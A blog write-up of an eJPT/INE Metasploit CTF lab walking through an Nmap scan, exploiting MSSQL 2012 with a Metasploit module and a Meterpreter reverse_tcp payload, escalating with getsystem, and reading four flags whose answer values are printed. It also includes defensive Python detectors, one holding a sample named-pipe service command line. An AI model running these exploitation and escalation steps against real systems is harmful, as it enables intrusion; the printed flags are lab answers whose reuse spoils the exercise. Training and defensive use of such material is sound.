Prinu_17
5 min read, Jan 19, 2025

Host & Network Penetration Testing: The Metasploit Framework CTF 1 (EJPT INE)

Hello everyone,

A little late for this walkthrough due to some work! Let’s dive into the first CTF of the Metasploit Framework.

Let’s get started!

Q.1 Gain access to the MSSQLSERVER account on the target machine to retrieve the first flag.

As always, we start with an Nmap scan. Here’s the command: nmap -sC -sV target.ine.local --min-rate 1000

This command runs the default NSE scripts (-sC) and service/version detection (-sV) against the target, and sets a minimum send rate of 1000 packets per second (--min-rate 1000) to speed up the scan.

Now that we know MSSQL Server is running on port 1433, and the version is SQL Server 2012 (11.00.6020.00; SP3), we can search for an exploit based on this version.
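The same scan result is what an asset owner would want to catch before anyone else does. The following is an added example (not part of the original walkthrough) that parses Nmap’s XML output (nmap -oX) and flags any open MSSQL listener whose major version has left Microsoft extended support. The XML below is constructed to mirror the scan described above; the IP address is a placeholder, and the end-of-support dates are taken from Microsoft’s lifecycle information and should be re-checked against current data.

```python
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Constructed sample in Nmap's -oX format, modelled on the scan result described in the
# walkthrough (ms-sql-s on 1433, SQL Server 2012 build 11.00.6020.00 SP3). The IP is a placeholder.
SAMPLE_NMAP_XML = """<?xml version="1.0"?>
<nmaprun scanner="nmap">
  <host>
    <address addr="10.0.0.5" addrtype="ipv4"/>
    <hostnames><hostname name="target.ine.local" type="user"/></hostnames>
    <ports>
      <port protocol="tcp" portid="135"><state state="open"/><service name="msrpc" product="Microsoft Windows RPC"/></port>
      <port protocol="tcp" portid="1433"><state state="open"/><service name="ms-sql-s" product="Microsoft SQL Server 2012" version="11.00.6020.00; SP3"/></port>
      <port protocol="tcp" portid="3389"><state state="closed"/><service name="ms-wbt-server"/></port>
    </ports>
  </host>
</nmaprun>"""

# SQL Server major (release) version -> end of Microsoft extended support (ISO dates).
# Assumption: taken from Microsoft's lifecycle pages; verify against current lifecycle data.
SQL_SERVER_EOL = {
    "10": "2019-07-09",  # SQL Server 2008 / 2008 R2
    "11": "2022-07-12",  # SQL Server 2012
    "12": "2024-07-09",  # SQL Server 2014
}


@dataclass
class Finding:
    host: str
    port: int
    service: str
    product: str
    version: str
    reason: str


def parse_open_services(xml_text):
    """Return (addr, port, service name, product, version) for every open port in the scan."""
    root = ET.fromstring(xml_text)
    results = []
    for host in root.iter("host"):
        addr = host.find("address").get("addr")
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue
            svc = port.find("service")
            results.append((
                addr,
                int(port.get("portid")),
                svc.get("name", "") if svc is not None else "",
                svc.get("product", "") if svc is not None else "",
                svc.get("version", "") if svc is not None else "",
            ))
    return results


def sql_server_major(version):
    """'11.00.6020.00; SP3' -> '11' (the release line the build belongs to)."""
    return version.split(".")[0].strip() if version else ""


def assess(xml_text, today="2025-01-19"):
    """Flag every reachable MSSQL listener; note when its release line is out of support.
    ISO date strings compare correctly as plain strings, so no date parsing is needed."""
    findings = []
    for addr, portid, name, product, version in parse_open_services(xml_text):
        if name != "ms-sql-s":
            continue
        major = sql_server_major(version)
        eol = SQL_SERVER_EOL.get(major)
        if eol and eol < today:
            reason = f"SQL Server release line {major} left extended support on {eol}"
        else:
            reason = "SQL Server reachable from the scanning host"
        findings.append(Finding(addr, portid, name, product, version, reason))
    return findings


if __name__ == "__main__":
    for f in assess(SAMPLE_NMAP_XML):
        print(f"{f.host}:{f.port} {f.product} ({f.version}) - {f.reason}")
```

Run it as a script and it prints one line per MSSQL listener; the interesting output is the reason text, which tells a patching team whether an upgrade, rather than a patch, is the only fix left.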

To do this, we can use Metasploit. Start it by typing msfconsole. Once inside Metasploit, search for available modules related to MSSQL 2012 using search MSSQL 2012.

At the top, we can see the relevant exploit. To select it, use the following command: use 0

We can also get detailed information about this module by using the info command. The description confirms that this exploit has been tested on SQL Server 2012, so it is suitable for our target. Now, we can proceed with configuring the required options before executing the exploit.

Set RHOSTS to target.ine.local. Then, run the exploit by typing: run

The module defaults to an x86 payload, but we are targeting a 64-bit system, so we need to set a compatible payload. To switch to an x64 payload, use the following command: set PAYLOAD windows/x64/meterpreter/reverse_tcp. After setting the correct payload, we can run the exploit again.

Now that we have a successful Meterpreter session, we can interact with the target system. To get an interactive command prompt, type the following command: shell

This will drop us into a regular command shell on the target machine.

To find the first flag, navigate to the root of the C drive by typing cd C:\. After that, list the contents of the directory to find the file that contains the flag: dir

Now that we’ve located the flag, we can use the type command to read its content.

FLAG 1: edb42cc5b37e4a1cac0cf88022f3c70d

Q.2 Locate the second flag within the Windows configuration folder.

For the second flag, we want to check the Windows configuration folder, which is usually found in the System32 directory. To navigate to it, type the following command: cd Windows\System32

To list only the directories in the System32 folder, use the following command: dir /a:d. This filters the results to show only directories.

Now that we can see the config folder, navigate into it using the cd command.

Access is denied when we try to view the contents. To understand why, we first need to review our privileges. Return to the Meterpreter session with Ctrl + C, then type getprivs to view the privileges that the current user holds.

These are the privileges of the current (service) user. We can use getsystem to elevate them, because if SeImpersonatePrivilege is present, getsystem is likely to succeed using Named Pipe Impersonation.
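From the defender’s side, the step above is one of the noisiest things an attacker does on a host, because the named-pipe technique has to create a pipe and then install a service that writes into it. The following is an added example, not part of the original walkthrough, that correlates Sysmon pipe-creation events (Event ID 17) with service-install events (System log Event ID 7045) and names the process and account that created the pipe. The log records are constructed, the field names are simplified from the two event schemas, and the cmd.exe/echo command line is the commonly documented shape of this technique, assumed here rather than taken from the page.

```python
import re
from datetime import datetime

# Constructed sample events (not real logs). Field names are simplified from Sysmon's
# PipeEvent (Event ID 17) and the System log's service-install event (Event ID 7045).
# The "cmd.exe /c echo ... > \\.\pipe\..." ImagePath is the documented shape of the
# named-pipe impersonation technique and is an assumption, not something shown on the page.
SAMPLE_EVENTS = [
    {"ts": "2025-01-19T10:02:01", "source": "Sysmon", "event_id": 17,
     "pipe": r"\spoolss", "image": r"C:\Windows\System32\spoolsv.exe",
     "user": r"NT AUTHORITY\SYSTEM"},
    {"ts": "2025-01-19T10:05:40", "source": "Sysmon", "event_id": 17,
     "pipe": r"\ytpkpcvo",
     "image": r"C:\Program Files\Microsoft SQL Server\MSSQL11.MSSQLSERVER\MSSQL\Binn\sqlservr.exe",
     "user": r"NT Service\MSSQLSERVER"},
    {"ts": "2025-01-19T10:05:41", "source": "System", "event_id": 7045,
     "service_name": "ytpkpcvo",
     "image_path": r"cmd.exe /c echo ytpkpcvo > \\.\pipe\ytpkpcvo", "user": "LocalSystem"},
    {"ts": "2025-01-19T11:00:00", "source": "System", "event_id": 7045,
     "service_name": "Backup Agent",
     "image_path": r"C:\Program Files\Backup\agent.exe", "user": "LocalSystem"},
]

# Matches a literal \\.\pipe\<name> inside a service binary path and captures the pipe name.
PIPE_IN_PATH = re.compile(r"\\\\\.\\pipe\\(?P<name>[^\s\"']+)", re.IGNORECASE)


def parse_ts(s):
    return datetime.fromisoformat(s)


def detect_named_pipe_impersonation(events, window_seconds=60):
    """Alert on every service install whose binary path points at a named pipe.

    A legitimate service binary is an executable on disk; a path that writes into
    \\.\pipe\<name> is the hallmark of the impersonation technique. When a Sysmon
    pipe-creation event for the same name precedes the install within the window,
    the alert also records which process and account created the pipe, which is
    the compromised foothold (here the SQL Server service account)."""
    pipe_events = [e for e in events if e["source"] == "Sysmon" and e["event_id"] == 17]
    alerts = []
    for e in events:
        if not (e["source"] == "System" and e["event_id"] == 7045):
            continue
        m = PIPE_IN_PATH.search(e["image_path"])
        if not m:
            continue
        name = m.group("name")
        alert = {"ts": e["ts"], "service": e["service_name"], "pipe": name,
                 "origin_image": None, "origin_user": None}
        installed_at = parse_ts(e["ts"])
        for p in pipe_events:
            # Sysmon records the pipe as "\name"; strip the leading backslash before comparing.
            same_pipe = p["pipe"].lstrip("\\").lower() == name.lower()
            delta = (installed_at - parse_ts(p["ts"])).total_seconds()
            if same_pipe and 0 <= delta <= window_seconds:
                alert["origin_image"] = p["image"]
                alert["origin_user"] = p["user"]
                break
        alerts.append(alert)
    return alerts


if __name__ == "__main__":
    for a in detect_named_pipe_impersonation(SAMPLE_EVENTS):
        print(f"{a['ts']} service '{a['service']}' writes to pipe '{a['pipe']}' "
              f"created by {a['origin_image']} as {a['origin_user']}")
```

The first rule (a service binary path containing \\.\pipe\) needs no correlation at all and is worth a standing alert on its own; the pipe-creation join is what turns the alert into a lead, because it points at the service account that was already under attacker control before the elevation.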

We have elevated our privileges. Now, we can use the shell command again to get the shell and continue searching for the second flag.

We have successfully entered the config directory. Type dir to list the contents.

We have found the second flag. To read its contents, use the command type flag2.txt.

FLAG 2: 95c12d0654eb4eac91db88262d644ac1

Q.3 The third flag is also hidden within the system directory. Find it to uncover a hint for accessing the final flag.

The question states that the third flag is also hidden within the system directory, but we don’t know its exact location. However, we know that the flag files end with .txt. To search for those files, use the following command: dir C:\Windows\System32\*.txt /s /b

This command searches for all .txt files within the System32 directory and its subdirectories (/s), printing each match as a bare full path (/b).

We see a file named EscalatePrivilageToGetThisFlag.txt. To read its contents, type the following command: type C:\Windows\System32\drivers\etc\EscalatePrivilageToGetThisFlag.txt

FLAG 3: 9a1dad2c57f441ac83d6755856f364c6

Q.4 Investigate the Administrator directory to find the fourth flag.

Since we have already elevated our privileges, let’s navigate to the Administrator directory to find the fourth flag.

To list the contents, type dir. Then navigate into the Desktop directory.

And here we have found our last flag, which is:

FLAG 4: f7337e642619460c8b1fee34114e578a

Thank you, everyone, for reading!

Happy Hacking!


Written by Prinu_17

Exploring web, API, mobile, and infrastructure security. Passionate about penetration testing, vulnerability research, and strengthening defenses.
